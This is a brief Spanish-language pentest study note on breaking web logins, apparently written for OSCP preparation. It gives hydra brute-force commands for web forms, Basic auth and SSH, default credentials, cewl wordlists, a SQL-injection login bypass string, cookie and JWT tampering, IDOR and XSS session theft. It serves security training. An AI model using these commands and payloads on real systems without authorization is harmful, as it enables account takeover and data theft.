# Authentication attacks > Romper logins web: credenciales por defecto, fuerza bruta y bypass. Casi siempre el primer intento en Hacking web. ## 1. Lo gratis primero - **Credenciales por defecto**: `admin:admin`, `admin:password`, `root:root`, las del CMS/producto (búscalas: `searchsploit ` o Google). - **Reutilización**: cualquier credencial que pillaste antes (Metodología OSCP). ## 2. Fuerza bruta con hydra ```bash # Formulario POST: necesitas el campo y el mensaje de fallo hydra -l admin -P /usr/share/wordlists/rockyou.txt IP http-post-form \ "/login.php:user=^USER^&pass=^PASS^:Invalid credentials" # HTTP Basic Auth: hydra -L users.txt -P pass.txt IP http-get /admin # SSH (si hay user válido): hydra -l bob -P rockyou.txt ssh://IP ``` - El `:F=mensaje` o `:S=éxito` es lo que distingue fallo de acierto → cógelo en Burp Repeater e Intruder. ## 3. Wordlists a medida ```bash cewl http://IP -w custom.txt # palabras de la propia web # combinar con reglas de hashcat / variaciones ``` ## 4. Bypass (no fuerza bruta) - **SQLi en el login** → `' OR '1'='1'-- -` → SQL injection. - **Cookies/roles manipulables**: `isAdmin=false` → `true`, `role=user` → `admin` (en Burp Suite). - **JWT**: alg `none`, secreto débil (`jwt_tool`, crackeo con rockyou). - **IDOR**: cambia `?id=1` por `?id=2` y accedes a datos de otro. - **Cookie/sesión robada** vía XSS. Relacionado: Burp Repeater e Intruder · SQL injection · OSCP MOC